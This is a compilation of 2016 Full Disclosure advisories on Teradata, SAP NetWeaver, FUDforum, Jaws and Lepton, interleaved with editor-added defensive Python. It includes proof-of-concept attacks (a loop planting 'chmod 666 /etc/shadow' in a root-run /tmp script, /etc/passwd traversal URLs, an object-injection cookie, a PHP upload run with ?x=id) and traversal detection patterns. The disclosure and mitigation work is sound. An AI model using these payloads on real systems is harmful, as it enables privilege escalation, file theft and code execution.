Exploit Code:
• $ ln -s /tmp/javaver /etc/passed
Advisory: http://www.vapidlabs.com/advisory.php?v=174

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Teradata Virtual Machine Community Edition v15.10 Insecure creation of files in /tmp

2016-11-18 Thread Larry W. Cashdollar
Title: Teradata Virtual Machine Community Edition v15.10 Insecure creation of 
files in /tmp
Author: Larry W. Cashdollar, @_larry0
Date: 2016-10-01
Download Site: 
http://downloads.teradata.com/download/database/teradata-virtual-machine-community-edition-for-vmware
Vendor: Teradata
Vendor Notified: 2016-10-01
Vendor Contact: web form contact
Description: Teradata is a relational database, they provide a Virtual Machine 
image for developers and community use.
Vulnerability:
Teradata Virtual Machine Community Edition v15.10: insecure creation of files 
in /tmp may lead to elevated code execution.
In /opt/teradata/gsctools/bin/t2a.pl

320 `chmod +x /tmp/$PROG.get_profile.scr ; /tmp/$PROG.get_profile.scr 
>/dev/null 2>&1` ;

If a regular user controls /tmp/t2a.pl.get_profile.scr before the person 
executing this script creates it, they can inject commands to be executed as 
that user.

for example:

$ while(true) do echo "chmod 666 /etc/shadow" >  /tmp/t2a.pl.get_profile.scr; 
done

If root or any other account runs that .pl script, I see these files being 
created in /tmp:

[C] -rw-r- 1 root root 14  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.cmd
[U] -rw-r- 1 root root 14  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.cmd
[C] -rw-r- 1 root root 0  Mon Oct  3 13:03:59 2016 /tmp/t2a.vprocmanager
[C] -rw-r- 1 root root 0  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.stderr
[U] -rw-r- 1 root root 44  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.stderr
[U] -rw-r- 1 root root 152  Mon Oct  3 13:03:59 2016 
/tmp/t2a.vprocmanager.stderr
[C] -rw-r- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr
[U] -rw-r- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr
[M] -rwxr-x--- 1 root root 5  Mon Oct  3 13:03:59 2016 /tmp/t2a.get_profile.scr 
 

CVE-ID: CVE-2016-7489
Exploit Code:
• $ while(true) do echo "chmod 666 /etc/shadow" >  
/tmp/t2a.pl.get_profile.scr; done
Advisory: www.vapidlabs.com/advisory.php?v=173

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
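Both Teradata posts above come down to the same defect: a privileged process writes to a fixed, predictable name under /tmp, a directory every local user can create entries in. The following is an added example by the editor, not Teradata code, that covers the two defensive halves: a scanner that flags hard-coded /tmp paths in a script (the same thing the grep in the first post finds, but as a reusable check), and the create-only open that a fixed path would need, demonstrated against a symlink planted at that name inside a throwaway directory. The script excerpt is constructed from lines quoted in the advisory.

```python
"""Fixed-path /tmp usage: find it, and create files in a way that cannot be
redirected.  Added example by the editor; not code from Teradata.  The
script excerpt is constructed from lines the first advisory quotes."""

import os
import re
import tempfile

# A literal /tmp or /tmp/<name> that is not part of a longer path component.
FIXED_TMP = re.compile(r"(?<![\w/])/tmp(?:/[\w.\-]+)?(?![\w/])")


def find_fixed_tmp_paths(script_text: str):
    """Return (line_number, path) for every hard-coded /tmp path in a script.

    Each hit is a name another local user can pre-create or symlink, which is
    exactly the race the two advisories describe."""
    hits = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        for m in FIXED_TMP.finditer(line):
            hits.append((lineno, m.group(0)))
    return hits


def create_exclusively(path: str) -> int:
    """Create `path` only if nothing exists there; return the descriptor.

    O_CREAT|O_EXCL fails with EEXIST when the name already exists, including
    when it is a (possibly dangling) symlink planted by someone else, so the
    write can never land on a file the symlink points at.  O_NOFOLLOW is added
    where the platform has it; mode 0600 keeps the content private."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    return os.open(path, flags, 0o600)


def private_tempfile(prefix: str = "studioexinstall.") -> tuple:
    """Preferred form: mkstemp picks an unpredictable name and creates it
    exclusively with mode 0600, so there is no fixed name to race at all."""
    return tempfile.mkstemp(prefix=prefix)


def private_tempfile_mode() -> int:
    """Permission bits mkstemp applies (cleans up after itself)."""
    fd, path = private_tempfile()
    try:
        return os.fstat(fd).st_mode & 0o777
    finally:
        os.close(fd)
        os.unlink(path)


def planted_symlink_is_refused() -> bool:
    """Inside a scratch directory, plant a symlink at the 'fixed' name and show
    that create_exclusively() refuses it while the target is untouched."""
    with tempfile.TemporaryDirectory() as workdir:
        victim = os.path.join(workdir, "pretend-system-file")
        with open(victim, "w") as fh:
            fh.write("original\n")
        fixed_name = os.path.join(workdir, "javaver")     # plays /tmp/javaver
        os.symlink(victim, fixed_name)                    # the planted link
        try:
            fd = create_exclusively(fixed_name)
        except FileExistsError:
            with open(victim) as fh:
                return fh.read() == "original\n"
        os.close(fd)
        return False


SCRIPT_EXCERPT = """\
ASKDIRFILE=/tmp/sqlajeaskdir
TMP=/tmp
java -version > "/tmp/javaver" 2>&1
rm -f /tmp/javaver
"""

if __name__ == "__main__":
    for lineno, path in find_fixed_tmp_paths(SCRIPT_EXCERPT):
        print(f"line {lineno}: fixed temp path {path}")
    print("mkstemp mode:", oct(private_tempfile_mode()))
    print("symlink at a fixed name refused:", planted_symlink_is_refused())
```

The shell equivalents are mktemp(1) for the unpredictable name and a per-run private directory (mktemp -d) when several files are needed; a shell `>` redirection to a fixed name has no O_EXCL semantics, so it should not be used in /tmp at all.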

[FD] [ERPSCAN-16-032] SAP Telnet Console – Directory traversal vulnerability

2016-11-18 Thread ERPScan inc
Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver AS JAVA 7.1 to 7.5

Vendor URL: http://SAP.com

Bugs: Directory traversal

Sent: 04.12.2015

Reported: 05.12.2015

Vendor response: 05.12.2015

Date of Public Advisory: 09.08.2016

Reference: SAP Security Note 2280371

Author:   Mathieu Geli (ERPScan)



Description


1. ADVISORY INFORMATION

Title: [ERPSCAN-16-032] SAP Telnet Console – Directory traversal vulnerability

Advisory ID: [ERPSCAN-16-032]

Risk: high

Advisory URL: 
https://erpscan.com/advisories/erpscan-16-032-sap-netweaver-telnet-console-file-disclosure/

Date published: 11.11.2016

Vendors contacted: SAP


2. VULNERABILITY INFORMATION

Class: Directory traversal

Impact: read file from system

Remotely Exploitable: yes

Locally Exploitable: yes



CVSS Information

CVSS Base Score v3: 3.4 / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range)                         Adjacent (A)
AC : Attack Complexity (Required attack complexity)                Low (L)
PR : Privileges Required (Level of privileges needed to exploit)   High (H)
UI : User Interaction (Required user participation)                None (N)
S  : Scope (Change in scope due to impact caused to components
     beyond the vulnerable component)                              Changed (C)
C  : Impact to Confidentiality                                     Low (L)
I  : Impact to Integrity                                           None (N)
A  : Impact to Availability                                        None (N)



3. VULNERABILITY DESCRIPTION

An authenticated user can disclose file content outside of the JVM
through the SAP Telnet Console service.


4. VULNERABLE PACKAGES

J2EE ENGINE SERVERCORE 7.10

J2EE ENGINE SERVERCORE 7.11

J2EE ENGINE SERVERCORE 7.20

J2EE ENGINE SERVERCORE 7.30

J2EE ENGINE SERVERCORE 7.31

J2EE ENGINE SERVERCORE 7.40

J2EE ENGINE SERVERCORE 7.50


5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note  2280371



6. AUTHOR

  Mathieu Geli (ERPScan)


7. TECHNICAL DESCRIPTION


SAP Netweaver Telnet Console File Disclosure via the GREP command of
the SYSTEM admin group.


7.1. Proof of Concept


GREP ":" /etc/passwd


at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash

bin:x:1:1:bin:/bin:/bin/bash

daemon:x:2:2:Daemon:/sbin:/bin/bash

[...]


8. REPORT TIMELINE

Sent: 04.12.2015

Reported: 05.12.2015

Vendor response: 05.12.2015

Date of Public Advisory: 09.08.2016


9. REFERENCES

https://erpscan.com/advisories/erpscan-16-032-sap-netweaver-telnet-console-file-disclosure/



10. ABOUT ERPScan Research

ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.

ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.

ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.

ERPScan experts were interviewed in specialized info-sec resources and
featured in major media worldwide. Among them there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.

Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.

11. ABOUT ERPScan

ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP
Solution providers” and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.

ERPScan’s primary mission is to close the gap between technical and
business security and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.

We ‘follow the sun’ and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
c

[FD] [ERPSCAN-16-031] SAP NetWeaver AS ABAP – directory traversal using READ DATASET

2016-11-18 Thread ERPScan inc
Application: SAP NetWeaver AS ABAP

Versions Affected: SAP NetWeaver AS ABAP 7.4

Vendor URL: http://SAP.com

Bugs: Directory traversal

Sent: 22.04.2016

Reported: 23.04.2016

Vendor response: 23.04.2016

Date of Public Advisory: 09.08.2016

Reference: SAP Security Note 2312966

Author: Daria Prosochkina (ERPScan)



Description



1. ADVISORY INFORMATION

Title: [ERPSCAN-16-031] SAP NetWeaver AS ABAP – directory traversal
using READ DATASET

Advisory ID: [ERPSCAN-16-031]

Risk: high

Advisory URL: 
https://erpscan.com/advisories/erpscan-16-031-sap-netweaver-abap-directory-traversal-via-using-read-dataset/

Date published: 11.11.2016

Vendors contacted: SAP


2. VULNERABILITY INFORMATION

Class: Directory traversal

Impact: read file from system

Remotely Exploitable: yes

Locally Exploitable: yes


CVSS Information

CVSS Base Score v3:   4.3 / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range) Network (N)

AC : Attack Complexity (Required attack complexity) Low (L)

PR : Privileges Required (Level of privileges needed to exploit) Low (L)

UI : User Interaction (Required user participation) None (N)

S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)

C : Impact to Confidentiality Low (L)

I : Impact to Integrity None (N)

A : Impact to Availability None (N)



3. VULNERABILITY DESCRIPTION

The code provides access to the file specified after the READ DATASET
statement. The variable transmitted to the input of the statement is
entered in it by user input. Thus, the user can access the files
stored on the operating system. This vulnerability is called a
Directory Traversal.

The attack is possible if the application does not check the user data
and does not delete special characters used for a directory traversal
attack from the variable, in which the filename is passed. As a
result, an attacker can read data from all files, to which the
application has access.

To discover this vulnerability, data flow analysis and other unique
techniques are used.


4. VULNERABLE PACKAGES

SAP_ABA 700

SAP_ABA 701

SAP_ABA 702

SAP_ABA 710

SAP_ABA 711

SAP_ABA 730

SAP_ABA 731

SAP_ABA 740

SAP_ABA 750

SAP_ABA 751

SAP_ABA 75A

SAP_ABA 75B


5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2312966.



6. AUTHOR

Daria Prosochkina (ERPScan)


7. TECHNICAL DESCRIPTION

An attacker can read any file from the OS by using the BUPA_BIP_FILE_IMPORT program.

The filename used in the READ DATASET statement (line 428) is entered into this
statement from user input. A user can pass an arbitrary file path as input,
for example /etc/passwd. As a result of executing the BUPA_BIP_FILE_IMPORT
program, data from /etc/passwd will be written to the P_FLEN variable in hex
format.


Vulnerable code


426.  p_flen = 0.
427.  DO.
428.    READ DATASET p_ifilea INTO lw.
429.*   Exit conditions for accessing in a loop
430.    IF sy-subrc NE 0. EXIT. ENDIF.
431.    APPEND lw TO p_itab .
432.
433.    p_flen = p_flen + XSTRLEN( lw-d ) .
434.  ENDDO.



8. REPORT TIMELINE

Sent: 22.04.2016

Reported: 23.04.2016

Vendor response: 23.04.2016

Date of Public Advisory: 09.08.2016



9. REFERENCES

https://erpscan.com/advisories/erpscan-16-031-sap-netweaver-abap-directory-traversal-via-using-read-dataset/



[FD] FUDforum 3.0.6: LFI

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    FUDforum 3.0.6
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://fudforum.org/forum/
Vulnerability Type:  LFI
Remote Exploitable:  Yes
Reported to vendor:  04/11/2016
Disclosed to public: 11/10/2016
Release mode:        Full Disclosure
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable
to local file inclusion. This allows an attacker to read arbitrary files that
the web user has access to.

Admin credentials are required.

3. Details

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description: The "file" parameter of the hlplist.php script is vulnerable to
directory traversal, which allows the viewing of arbitrary files.

Proof of Concept:

http://localhost/fudforum/adm/hlplist.php?tname=default&tlang=./af&&SQ=4b181ea1d2d40977c7ffddb8a48a4724&file=../../../../../../../../../../etc/passwd

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/FUDforum-306-LFI-167.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

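Both file-disclosure issues above, the ABAP program that passes an unchecked path to READ DATASET and the FUDforum hlplist.php "file" parameter, have the same fix: resolve the user-supplied name against one fixed base directory and refuse anything that escapes it. The following is an added example, not code from either advisory or vendor; the base directory, the request paths and the access-log lines are constructed for illustration, and the second function shows the matching detection pass over web-server logs.

```python
import os
from urllib.parse import unquote


class PathTraversalError(ValueError):
    """Raised when a user-supplied file name would escape the allowed directory."""


def safe_join(base_dir: str, user_name: str) -> str:
    """Resolve user_name under base_dir and refuse anything that escapes it.

    The name is percent-decoded before the check (twice, to catch the
    double-encoded %252e%252e%252f form), and the comparison is done on the
    canonical real path, so "..", symlinks and redundant separators cannot
    slip past a plain string comparison.
    """
    decoded = unquote(unquote(user_name))
    if "\x00" in decoded:
        raise PathTraversalError("NUL byte in file name")
    if os.path.isabs(decoded):
        raise PathTraversalError("absolute path not allowed")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded))
    # Valid results are the base directory itself or something strictly below it.
    if candidate != base and not candidate.startswith(base + os.sep):
        raise PathTraversalError(f"{user_name!r} escapes {base_dir!r}")
    return candidate


def is_rejected(base_dir: str, user_name: str) -> bool:
    """Convenience predicate: True when safe_join refuses the name."""
    try:
        safe_join(base_dir, user_name)
    except PathTraversalError:
        return True
    return False


# Markers worth flagging in request paths; compared case-insensitively and
# both before and after one round of percent-decoding.
TRAVERSAL_MARKERS = ("../", "..\\", "..%2f", "..%5c", "%2e%2e%2f", "%2e%2e/", "%2e%2e%5c")


def flag_traversal_requests(access_log_lines):
    """Return (line_number, decoded_request_path) for lines carrying traversal markers."""
    hits = []
    for number, line in enumerate(access_log_lines, 1):
        quoted = line.split('"')
        if len(quoted) < 2:
            continue                              # not a combined-format line
        request_fields = quoted[1].split(" ")     # METHOD PATH PROTOCOL
        if len(request_fields) < 2:
            continue
        raw_path = request_fields[1]
        lowered = raw_path.lower()
        decoded = unquote(lowered)
        if any(m in lowered or m in decoded for m in TRAVERSAL_MARKERS):
            hits.append((number, unquote(raw_path)))
    return hits


# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Nov/2016:10:00:01 +0100] "GET /fudforum/adm/hlplist.php?tname=default&file=help.html HTTP/1.1" 200 1432',
    '10.0.0.9 - - [10/Nov/2016:10:00:07 +0100] "GET /fudforum/adm/hlplist.php?tname=default&file=../../../../etc/passwd HTTP/1.1" 200 2311',
    '10.0.0.9 - - [10/Nov/2016:10:00:09 +0100] "GET /fudforum/adm/hlplist.php?file=%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1" 200 2311',
    '10.0.0.7 - - [10/Nov/2016:10:01:00 +0100] "GET /fudforum/index.php?t=index HTTP/1.1" 200 8831',
]


if __name__ == "__main__":
    base = "/srv/fudforum/help"          # hypothetical help-file directory
    print(safe_join(base, "af/index.html"))
    for bad in ("../../../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd", "/etc/passwd"):
        print("rejected:", bad, is_rejected(base, bad))
    for number, path in flag_traversal_requests(SAMPLE_LOG):
        print(f"line {number}: {path}")
```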

[FD] Jaws 1.1.1: Object Injection, Open Redirect, Cookie Flags

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Jaws 1.1.1
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://jaws-project.com/
Vulnerability Type:  Object Injection, Open Redirect, Cookie Flags
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Full Disclosure
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

Jaws is a content management system written in PHP. In version 1.1.1, it is
vulnerable to various low to medium impact issues. It contains an Object
Injection, which does not seem to be currently exploitable without custom
changes made by users; its session cookies are not set to httpOnly, which may
make it easier to exploit XSS issues; and it contains an Open Redirect issue.

3. Details

Open Redirect / Phishing

After a login is performed, a user is redirected to a website defined in the
URL, which may be exploited in phishing attacks.

Note that the redirect only works if the user was not logged in previously, and
then only after a login is performed.

Proof of Concept:

http://localhost/jaws-complete-1.1.1/index.php/users/login/referrer/687474703a2f2f6578616d706c652e636f6d.html

687474703a2f2f6578616d706c652e636f6d is the result of a hex2bin call.

Object Injection

All parameters passed to the application are passed to unserialize, making the
application vulnerable to Object Injection.

Currently, there does not seem to be code that can be exploited via Object
Injection, but this may change in the future, or users may have custom code
which isn't in itself vulnerable, but would result in vulnerable code in
combination with this issue.

Proof of Concept:

All values passed to the application are vulnerable, for example a cookie:

GET /jaws-complete-1.1.1/admin.php?checksess HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JAWSSESSID=O:{};
Connection: close
Cache-Control: max-age=0

Cookie Flags

The JAWSSESSID cookie does not have the httpOnly flag set, making it slightly
easier to exploit XSS vulnerabilities.

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/05/2016 Informed Vendor about Issue (no reply)
09/15/2016 Reminded Vendor of Disclosure Date (no reply)
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Jaws-111-Object-Injection-Open-Redirect-Cookie-Flags-168.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

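The open redirect above comes from the post-login referrer being taken from the URL (hex-encoded, as the advisory shows) and followed without checking where it points. The following is an added example, not Jaws code: it decodes the parameter and only honours a relative path on the same site, falling back to a fixed landing page otherwise. The hex value of http://example.com is the one from the advisory; the other sample values and the landing page are constructed.

```python
from binascii import Error as HexError, unhexlify
from typing import Optional
from urllib.parse import urlsplit

DEFAULT_LANDING = "/index.php"   # constructed fallback for this example


def decode_referrer(param: str) -> Optional[str]:
    """Decode the hex-encoded referrer parameter; None if it is not valid hex/UTF-8."""
    try:
        return unhexlify(param).decode("utf-8")
    except (HexError, ValueError, UnicodeDecodeError):
        return None


def is_safe_local_redirect(target: str) -> bool:
    """True only for a relative path on this site, such as '/users/profile?x=1'."""
    if not target or any(c in target for c in "\r\n\x00"):
        return False
    # '//host' is protocol-relative and '/\host' is normalised to it by browsers;
    # both leave the site even though they start with a slash.
    if target.startswith("//") or "\\" in target:
        return False
    parts = urlsplit(target)
    # Any scheme (http:, javascript:, data:) or network location means another origin.
    if parts.scheme or parts.netloc:
        return False
    return target.startswith("/")


def post_login_redirect(hex_param: str) -> str:
    """Where to send the user after login: the decoded referrer if local, else the fallback."""
    decoded = decode_referrer(hex_param)
    if decoded is not None and is_safe_local_redirect(decoded):
        return decoded
    return DEFAULT_LANDING


if __name__ == "__main__":
    samples = (
        "687474703a2f2f6578616d706c652e636f6d",   # http://example.com  (from the advisory)
        "2f75736572732f70726f66696c65",           # /users/profile      (constructed)
        "2f2f6578616d706c652e636f6d",             # //example.com       (constructed)
        "zz",                                     # not hex at all
    )
    for p in samples:
        print(f"{p:40} -> {decode_referrer(p)!r:24} -> {post_login_redirect(p)}")
```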

[FD] FUDforum 3.0.6: Multiple Persistent XSS & Login CSRF

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    FUDforum 3.0.6
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://fudforum.org/forum/
Vulnerability Type:  XSS, Login CSRF
Remote Exploitable:  Yes
Reported to vendor:  04/11/2016
Disclosed to public: 11/10/2016
Release mode:        Full Disclosure
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable
to multiple persistent XSS issues. This allows an attacker to steal cookies,
inject JavaScript keyloggers, or bypass CSRF protection. Additionally, FUDforum
is vulnerable to Login-CSRF.

3. Details

XSS 1: Via Filename in Private Message

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The filename of attached images in private messages is vulnerable
to persistent XSS.

Proof of Concept:

Send a PM to a user. Add an attachment, where the filename is: '">.jpg

When the recipient views the PM, the injected code will be executed.

XSS 2: Via Filename in Forum Posts

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The filename of attached images in forum posts is vulnerable to
persistent XSS.

Proof of Concept:

Create a new forum post. Add an attachment, where the filename is: '">.jpg

When viewing the post, the injected code will be executed.

XSS 3: Via Signature in User Profile

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: When editing a profile, the signature is echoed unencoded, leading
to persistent XSS.

Proof of Concept:

Visit http://localhost/fudforum/index.php?t=register and, as signature, use '">

The injected code is either executed when the user themselves edits their
profile - which may be exploited via login CSRF - or when an admin visits the
edit profile page located here:
http://localhost/fudforum/index.php?t=register&mod_id=6&&SQ=1a85a858f326ec6602cb6d78d698f60a

Login CSRF

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description: The login of FUDForum does not have any CSRF protection. The
impact of this is low, but an attacker might get a victim to disclose sensitive
information by using CSRF to log the victim into an attacker-controlled
account. An example would be the accidental sending of a sensitive private
message while being logged into an account controlled by an attacker.
Additionally, Login-CSRF may enable an attacker to exploit XSS issues in the
user area.

Proof of Concept:

  http://localhost/fudforum/index.php?t=login"; method
="POST">

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

04/11/2016 Informed Vendor about Issue (no reply)
09/14/2016 Reminded Vendor (no reply)
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/FUDforum-306-Multiple-Persistent-XSS-amp-Login-CSRF-169.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany


[FD] Jaws 1.1.1: Code Execution

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Jaws 1.1.1
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://jaws-project.com/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Full Disclosure
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

Jaws is a content management system written in PHP. In version 1.1.1, it is
vulnerable to code execution as it allows the upload of files with a dangerous
type.

An account with extended privileges is required.

3. Details

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

The file manager forbids the uploading of most PHP and htaccess files by
checking the extension of uploaded files and renaming files when required.

However, the check can be bypassed by an attacker as the file extension .pht -
which is treated as PHP file by default Apache installations - is not filtered.

An account with access to the file manager is required.

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/05/2016 Informed Vendor about Issue (no reply)
09/15/2016 Reminded Vendor of Disclosure Date (no reply)
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Jaws-111-Code-Execution-170.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany


[FD] Lepton 2.2.2: Code Execution

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    LEPTON 2.2.2 stable
Fixed in:            2.3.0
Fixed Version Link:  http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Vendor Website:      http://www.lepton-cms.org/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it is
vulnerable to code execution as it is possible to upload files with dangerous
type via the media manager.

3. Details

Upload of file with dangerous type

CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description: When uploading a file in the media tab, there is a client-side as
well as a server-side extension check. The server-side check can be bypassed by
including a valid extension before the desired extension, leading to code
execution or XSS.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/media/index.php?leptoken=099c871bbf640f2f91d2az1472132032 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: lep9131sessionid=8bgkd5rae5nhbn0jaac8jpkpc5
Connection: close
Content-Type: multipart/form-data; boundary=---38397165016927337851258279296
Content-Length: 613

-38397165016927337851258279296
Content-Disposition: form-data; name="action"

media_upload
-38397165016927337851258279296
Content-Disposition: form-data; name="current_dir"


-38397165016927337851258279296
Content-Disposition: form-data; name="upload[]"; filename="test.png.php5"
Content-Type: image/png

http://localhost/LEPTON_stable_2.2.2/upload/media/test.png.php5?x=id

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-Code-Execution-171.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

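The two upload issues above, the Jaws file manager whose extension denylist misses .pht and the Lepton media upload that accepts test.png.php5 because only the last extension is checked, fail for the same reason: a denylist, applied to one segment, against a server that may execute any segment. The following is an added example, not code from either project: it allowlists every extension segment, refuses instead of renaming, and lets the server choose the stored name. The extension sets and sample file names are constructed for illustration.

```python
import os
import secrets

# Extensions this application actually needs to accept. Anything else is refused,
# so a new server-side handler (.pht, .php5, .phar, ...) never needs a denylist update.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}

# Extensions a default Apache/mod_php setup may hand to PHP or that change server
# behaviour. Used only to label the audit report; the allowlist is the control.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "pht",
                         "phar", "htaccess", "htpasswd"}


class UploadRejected(ValueError):
    """Raised instead of silently renaming: on-the-fly renaming is what left the gap."""


def extension_segments(filename: str):
    """Every dot-separated segment after the base name, lower-cased.

    'test.png.php5' -> ['png', 'php5'], '.htaccess' -> ['htaccess'].
    Apache's AddHandler can match *any* segment, so each one must be checked,
    not just the last.
    """
    name = os.path.basename(filename.replace("\\", "/"))
    parts = name.split(".")
    return [p.lower() for p in parts[1:] if p]


def audit_filename(filename: str) -> dict:
    """Classify an upload name; returns the segments seen, the verdict and the reason."""
    segments = extension_segments(filename)
    report = {"segments": segments, "accepted": False, "reason": ""}
    executable = [s for s in segments if s in EXECUTABLE_EXTENSIONS]
    unknown = [s for s in segments if s not in ALLOWED_EXTENSIONS]
    if not segments:
        report["reason"] = "no extension"
    elif executable:
        report["reason"] = "executable extension segment: " + ",".join(executable)
    elif unknown:
        report["reason"] = "segment not on allowlist: " + ",".join(unknown)
    else:
        report["accepted"] = True
    return report


def stored_name(filename: str) -> str:
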